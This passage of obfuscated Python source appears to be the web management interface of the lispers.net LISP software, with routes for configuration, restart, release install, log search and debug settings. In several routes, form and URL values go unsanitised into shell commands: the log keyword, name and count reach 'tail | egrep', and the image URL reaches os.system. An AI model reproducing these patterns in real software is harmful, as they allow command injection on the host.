OooO0oo , lisp . lisp_space ( 1 ) , O0ooooo0OOOO0 , o0o0oOoOO0O , IIiiI , iIiIIIIIii ,
O00oOo00o0o )
if 71 - 71: I1ii11iIi11i - ooOoO0o / OoOoOO00 * OoOoOO00 / i1IIi . i1IIi
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 53 - 53: I1Ii111
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
if 11 - 11: OoooooooOO . I1Ii111
if 80 - 80: OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / I1IiiI / OOooOOo
if 13 - 13: I1Ii111 * ooOoO0o + i11iIiiIii * I1Ii111 - ooOoO0o
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * IiII
@ bottle . route ( '/lisp/show/conf' )
def I1Iiiiiii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
return ( bottle . static_file ( "lisp.config" , root = "./" , mimetype = "text/plain" ) )
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
@ bottle . route ( '/lisp/show/diff' )
def oOOoOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 89 - 89: II111iiii + i1IIi + II111iiii
return ( bottle . static_file ( "lisp.config.diff" , root = "./" ,
mimetype = "text/plain" ) )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
@ bottle . route ( '/lisp/archive/conf' )
def OoO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: OoOoOO00 + i11iIiiIii - II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
lisp . lisp_ipc_lock . acquire ( )
os . system ( "cp ./lisp.config ./lisp.config.archive" )
lisp . lisp_ipc_lock . release ( )
if 90 - 90: iII111i
i1I1ii = "Configuration file saved to "
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
i1I1ii += lisp . lisp_print_cour ( "./lisp.config.archive" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
@ bottle . route ( '/lisp/clear/conf' )
def I1iIiI11I1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 27 - 27: Ii1I . i11iIiiIii % I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
os . system ( "cp ./lisp.config ./lisp.config.before-clear" )
lisp . lisp_ipc_lock . acquire ( )
iI11I ( )
lisp . lisp_ipc_lock . release ( )
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
i1I1ii = "Configuration cleared, a backup copy is stored in "
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
i1I1ii += lisp . lisp_print_cour ( "./lisp.config.before-clear" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
if 61 - 61: I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
if 85 - 85: OoooooooOO * iIii1I11I1II1 . iII111i / OoooooooOO % I1IiiI % O0
if 36 - 36: Ii1I / II111iiii / IiII / IiII + I1ii11iIi11i
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
@ bottle . route ( '/lisp/clear/conf/verify' )
def OOoOoo0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 17 - 17: Ii1I + oO0o . OoO0O00 - Oo0Ooo * i11iIiiIii
if 20 - 20: I1IiiI . OoooooooOO % OOooOOo
i1I1ii = "<br>Are you sure you want to clear the configuration?"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 63 - 63: I1IiiI % iIii1I11I1II1
I1ii = lisp . lisp_button ( "yes" , "/lisp/clear/conf" )
O00O0O = lisp . lisp_button ( "cancel" , "/lisp" )
i1I1ii += I1ii + O00O0O + "<br>"
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
def I1iOOOO ( ) :
oOoO0o00OO0 = ""
if 88 - 88: iII111i
for iiI11I1i1i1iI in [ "443" , "-8080" , "8080" ] :
OoOOo000o0 = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep' . format ( iiI11I1i1i1iI )
i1I1ii = commands . getoutput ( OoOOo000o0 )
if ( i1I1ii == "" ) : continue
if 12 - 12: II111iiii . I11i / OOooOOo
i1I1ii = i1I1ii . split ( "\n" ) [ 0 ]
i1I1ii = i1I1ii . split ( " " )
if ( i1I1ii [ - 2 ] == "lisp-core.pyo" and i1I1ii [ - 1 ] == iiI11I1i1i1iI ) : oOoO0o00OO0 = iiI11I1i1i1iI
break
if 77 - 77: ooOoO0o - I1IiiI % I11i - O0
return ( oOoO0o00OO0 )
if 67 - 67: OOooOOo + Oo0Ooo
if 84 - 84: O0 * OoooooooOO - IiII * IiII
if 8 - 8: ooOoO0o / i1IIi . oO0o
if 41 - 41: iII111i + OoO0O00
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
@ bottle . route ( '/lisp/restart' )
def iIII1i1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: II111iiii * I11i - OoooooooOO . I11i . I11i
if 11 - 11: I1Ii111 / OoOoOO00 + I11i % iIii1I11I1II1
if 42 - 42: I1ii11iIi11i * OoOoOO00 % ooOoO0o - OoOoOO00 . i11iIiiIii - I1Ii111
if 84 - 84: I1Ii111 - I1ii11iIi11i / I11i
if 13 - 13: IiII - Oo0Ooo - ooOoO0o
if 92 - 92: ooOoO0o / OoOoOO00 * OoO0O00 . I11i % II111iiii
OooOO = commands . getoutput ( "egrep requiretty /etc/sudoers" ) . split ( " " )
if ( OooOO [ - 1 ] == "requiretty" and OooOO [ 0 ] == "Defaults" ) :
i1I1ii = "Need to remove 'requiretty' from /etc/sudoers"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
lisp . lprint ( lisp . bold ( "LISP subsystem restart request received" , False ) )
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
oOoO0o00OO0 = I1iOOOO ( )
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
OoOOo000o0 = "sleep 1; sudo ./RESTART-LISP {}" . format ( oOoO0o00OO0 )
thread . start_new_thread ( os . system , ( OoOOo000o0 , ) )
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
i1I1ii = lisp . lisp_print_sans ( "Restarting LISP subsystem ..." )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
@ bottle . route ( '/lisp/restart/verify' )
def OO0O0o0o0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 31 - 31: Ii1I
if 44 - 44: OoOoOO00 - iIii1I11I1II1 - Oo0Ooo
i1I1ii = "<br>Are you sure you want to restart the LISP subsystem?"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 80 - 80: iIii1I11I1II1 * I1Ii111 % I11i % Oo0Ooo
I1ii = lisp . lisp_button ( "yes" , "/lisp/restart" )
O00O0O = lisp . lisp_button ( "cancel" , "/lisp" )
i1I1ii += I1ii + O00O0O + "<br>"
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 95 - 95: iIii1I11I1II1 - I1ii11iIi11i . I1Ii111 - I1IiiI
if 75 - 75: OoO0O00 + o0oOOo0O0Ooo - i1IIi . OoooooooOO * Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
@ bottle . route ( '/lisp/install' , method = "post" )
def iiIII1II ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 100 - 100: Oo0Ooo % Ii1I / I11i
if 30 - 30: Oo0Ooo - OOooOOo - iII111i
OOO = bottle . request . forms . get ( "image_url" )
if ( OOO . find ( "lispers.net" ) == - 1 or OOO . find ( ".tgz" ) == - 1 ) :
I11IIiIiI = "Invalid install request for file {}" . format ( OOO )
lisp . lprint ( lisp . bold ( I11IIiIiI , False ) )
i1I1ii = lisp . lisp_print_sans ( "Invalid lispers.net tarball file name" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if ( lisp . lisp_is_ubuntu ( ) ) :
OoOOo000o0 = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null" . format ( OOO )
else :
OoOOo000o0 = "python lisp-get-bits.pyo {} force >& /dev/null" . format ( OOO )
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
IIiiI = os . system ( OoOOo000o0 )
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
OoooO0o = OOO . split ( "/" ) [ - 1 ]
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if ( os . path . exists ( OoooO0o ) ) :
IIi1II = OOO . split ( "release-" ) [ 1 ]
IIi1II = IIi1II . split ( ".tgz" ) [ 0 ]
if 2 - 2: II111iiii - OoO0O00 . IiII * iII111i / oO0o
i1I1ii = "Install completed for release {}" . format ( IIi1II )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 80 - 80: OOooOOo / I11i / OoOoOO00 + i1IIi - Oo0Ooo
i1I1ii += "<br><br>" + lisp . lisp_button ( "restart LISP subsystem" ,
"/lisp/restart/verify" ) + "<br>"
else :
I11IIiIiI = lisp . lisp_print_cour ( OOO )
i1I1ii = "Install failed for file {}" . format ( I11IIiIiI )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 11 - 11: o0oOOo0O0Ooo * OoO0O00
if 15 - 15: OoOoOO00
I11IIiIiI = "Install request for file {} {}" . format ( OOO ,
"succeeded" if ( IIiiI == 0 ) else "failed" )
lisp . lprint ( lisp . bold ( I11IIiIiI , False ) )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 62 - 62: Ii1I
if 51 - 51: OoOoOO00
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
@ bottle . route ( '/lisp/install/image' )
def ooOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 37 - 37: Ii1I % OoO0O00
if 79 - 79: I1ii11iIi11i + I1IiiI / I1IiiI
I11IIiIiI = lisp . lisp_print_sans ( "<br>Enter lispers.net tarball URL:" )
i1I1ii = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>''' . format ( I11IIiIiI )
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
@ bottle . route ( '/lisp/log/flows' )
def oo0OoOooo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 95 - 95: IiII * I1ii11iIi11i % ooOoO0o % Ii1I - Ii1I
if 97 - 97: I1ii11iIi11i + iIii1I11I1II1 . O0
os . system ( "touch ./log-flows" )
if 64 - 64: i1IIi % ooOoO0o / i11iIiiIii - i1IIi % OOooOOo . iII111i
i1I1ii = lisp . lisp_print_sans ( "Flow data appended to file " )
II1i111 = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
i1I1ii += lisp . lisp_print_cour ( II1i111 )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
@ bottle . route ( '/lisp/search/log/<name>/<num>/<keyword>' )
def iIIi ( name = "" , num = "" , keyword = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
OOoOO0o0o0 = "tail -n {} logs/{}.log | egrep -B10 -A10 {}" . format ( num , name ,
keyword )
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if ( i1I1ii ) :
iI1iii = i1I1ii . count ( keyword )
i1I1ii = lisp . convert_font ( i1I1ii )
i1I1ii = i1I1ii . replace ( "--\n--\n" , "--\n" )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = i1I1ii . replace ( "--<br>" , "<hr>" )
i1I1ii = "Found <b>{}</b> occurences<hr>" . format ( iI1iii ) + i1I1ii
else :
i1I1ii = "Keyword {} not found" . format ( keyword )
if 87 - 87: I1ii11iIi11i / OoooooooOO - Oo0Ooo % OoOoOO00 % IiII % Oo0Ooo
if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
if 45 - 45: I1ii11iIi11i + OoO0O00 * i11iIiiIii / OOooOOo % I11i * O0
i1o0oooO = "<font color='blue'><b>{}</b>" . format ( keyword )
i1I1ii = i1I1ii . replace ( keyword , i1o0oooO )
i1I1ii = i1I1ii . replace ( keyword , keyword + "</font>" )
if 89 - 89: II111iiii / oO0o
i1I1ii = lisp . lisp_print_cour ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
@ bottle . post ( '/lisp/search/log/<name>/<num>' )
def oo0oOO ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
I1I1 = bottle . request . forms . get ( "keyword" )
return ( iIIi ( name , num , I1I1 ) )
if 4 - 4: o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
@ bottle . route ( '/lisp/show/log/<name>/<num>' )
def Oo0 ( name = "" , num = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 79 - 79: OoO0O00 % OOooOOo / iIii1I11I1II1 + OoOoOO00 * OoO0O00
if 30 - 30: OoooooooOO / I11i + iII111i / I1ii11iIi11i * O0
if 16 - 16: Oo0Ooo / i11iIiiIii
if 64 - 64: i11iIiiIii / Ii1I * i1IIi
if 73 - 73: Oo0Ooo - OoOoOO00 - oO0o - I1IiiI
if ( num == "" ) : num = 100
if 65 - 65: o0oOOo0O0Ooo
I1ii1II1iII = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
''' . format ( name , num )
if 8 - 8: OoOoOO00 / O0 * O0 % I1Ii111 - Oo0Ooo + I11i
if ( os . path . exists ( "logs/{}.log" . format ( name ) ) ) :
i1I1ii = commands . getoutput ( "tail -n {} logs/{}.log" . format ( num , name ) )
i1I1ii = lisp . convert_font ( i1I1ii )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = I1ii1II1iII + lisp . lisp_print_cour ( i1I1ii )
else :
oo = lisp . lisp_print_sans ( "File" )
Ii1IiIiIi1IiI = lisp . lisp_print_cour ( "logs/{}.log" . format ( name ) )
i1iiIIi1I = lisp . lisp_print_sans ( "does not exist" )
i1I1ii = "{} {} {}" . format ( oo , Ii1IiIiIi1IiI , i1iiIIi1I )
if 36 - 36: I1IiiI * Oo0Ooo
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 77 - 77: oO0o % i1IIi - Ii1I
if 93 - 93: OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
@ bottle . route ( '/lisp/debug/<name>' )
def ooOoO ( name = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if ( name == "disable%all" ) :
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( "lisp debug" )
if ( IIIi1i1I [ 0 ] . has_key ( "lisp debug" ) ) :
OoO0OOOOo0O = [ ]
for I1i1I in IIIi1i1I [ 0 ] [ "lisp debug" ] :
iii1I1Iii = I1i1I . keys ( ) [ 0 ]
OoO0OOOOo0O . append ( { iii1I1Iii : "no" } )
if 82 - 82: Ii1I + IiII
OoO0OOOOo0O = { "lisp debug" : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 12 - 12: I1Ii111
if 93 - 93: i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / o0oOOo0O0Ooo / II111iiii
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( "lisp xtr-parameters" )
if ( IIIi1i1I [ 0 ] . has_key ( "lisp xtr-parameters" ) ) :
OoO0OOOOo0O = [ ]
for I1i1I in IIIi1i1I [ 0 ] [ "lisp xtr-parameters" ] :
iii1I1Iii = I1i1I . keys ( ) [ 0 ]
if ( iii1I1Iii in [ "data-plane-logging" , "flow-logging" ] ) :
OoO0OOOOo0O . append ( { iii1I1Iii : "no" } )
else :
OoO0OOOOo0O . append ( { iii1I1Iii : I1i1I [ iii1I1Iii ] } )
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
OoO0OOOOo0O = { "lisp xtr-parameters" : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 1 - 1: IiII / IiII - i11iIiiIii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
return ( lispconfig . lisp_landing_page ( ) )
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
name = name . split ( "%" )
Ii11iI1ii1111 = name [ 0 ]
Iii111II = name [ 1 ]
if 42 - 42: I1Ii111 + I1Ii111 * II111iiii
o0Oo = [ "data-plane-logging" , "flow-logging" ]
if 57 - 57: OOooOOo / Oo0Ooo
oO0O0Ooo = "lisp xtr-parameters" if ( Ii11iI1ii1111 in o0Oo ) else "lisp debug"
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
IIIi1i1I = lispconfig . lisp_get_clause_for_api ( oO0O0Ooo )
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if ( IIIi1i1I [ 0 ] . has_key ( oO0O0Ooo ) ) :
OoO0OOOOo0O = { }
for I1i1I in IIIi1i1I [ 0 ] [ oO0O0Ooo ] :
OoO0OOOOo0O [ I1i1I . keys ( ) [ 0 ] ] = I1i1I . values ( ) [ 0 ]
if ( OoO0OOOOo0O . has_key ( Ii11iI1ii1111 ) ) : OoO0OOOOo0O [ Ii11iI1ii1111 ] = Iii111II
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
OoO0OOOOo0O = { oO0O0Ooo : OoO0OOOOo0O }
lispconfig . lisp_put_clause_for_api ( OoO0OOOOo0O )
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
return ( lispconfig . lisp_landing_page ( ) )
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
@ bottle . route ( '/lisp/clear/<name>' )
@ bottle . route ( '/lisp/clear/etr/<etr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>/<stats_name>' )
@ bottle . route ( '/lisp/clear/itr/<itr_name>' )
@ bottle . route ( '/lisp/clear/rtr/<rtr_name>' )
def ooooOoO0O ( name = "" , itr_name = '' , rtr_name = "" , etr_name = "" ,
stats_name = "" ) :
if 1 - 1: I1ii11iIi11i / OoO0O00 + oO0o . o0oOOo0O0Ooo / I1ii11iIi11i - iII111i
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 5 - 5: OOooOOo
if 4 - 4: iII111i % I1Ii111 / OoO0O00 . OOooOOo / OOooOOo - I1ii11iIi11i
if 79 - 79: I1ii11iIi11i + I1Ii111
if 10 - 10: Oo0Ooo + O0
if 43 - 43: iIii1I11I1II1 / II111iiii % o0oOOo0O0Ooo - OOooOOo
if ( lispconfig . lisp_is_user_superuser ( None ) == False ) :
i1I1ii = lisp . lisp_print_sans ( "Not authorized" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 62 - 62: I11i
if 63 - 63: OOooOOo + ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
Oo0O00Oo0o0 = "clear"
if ( name == "referral" ) :
OOoO00ooO = "lisp-mr"
I1IIIIiii1i = "Referral"
elif ( itr_name == "map-cache" ) :
OOoO00ooO = "lisp-itr"
I1IIIIiii1i = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif ( rtr_name == "map-cache" ) :
OOoO00ooO = "lisp-rtr"
I1IIIIiii1i = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif ( etr_name == "stats" ) :
OOoO00ooO = "lisp-etr"
I1IIIIiii1i = ( "ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>" ) . format ( stats_name )
if 51 - 51: OOooOOo . I1IiiI
Oo0O00Oo0o0 += "%" + stats_name
elif ( rtr_name == "stats" ) :
OOoO00ooO = "lisp-rtr"
I1IIIIiii1i = ( "RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>" ) . format ( stats_name )
if 73 - 73: OoooooooOO . I1IiiI / I1Ii111 % Ii1I
Oo0O00Oo0o0 += "%" + stats_name
else :
i1I1ii = lisp . lisp_print_sans ( "Invalid command" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 65 - 65: IiII - I1IiiI - Ii1I
if 42 - 42: II111iiii * I1IiiI % i1IIi - Ii1I % IiII
if 36 - 36: i11iIiiIii / oO0o * I1ii11iIi11i * I1ii11iIi11i + Ii1I * I11i
if 32 - 32: OoO0O00
if 50 - 50: ooOoO0o + i1IIi
Oo0O00Oo0o0 = lisp . lisp_command_ipc ( Oo0O00Oo0o0 , "lisp-core" )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , OOoO00ooO )
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
oo0ooooO = commands . getoutput ( "egrep 'lisp map-cache' ./lisp.config" )
if ( oo0ooooO != "" ) :
os . system ( "touch ./lisp.config" )
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
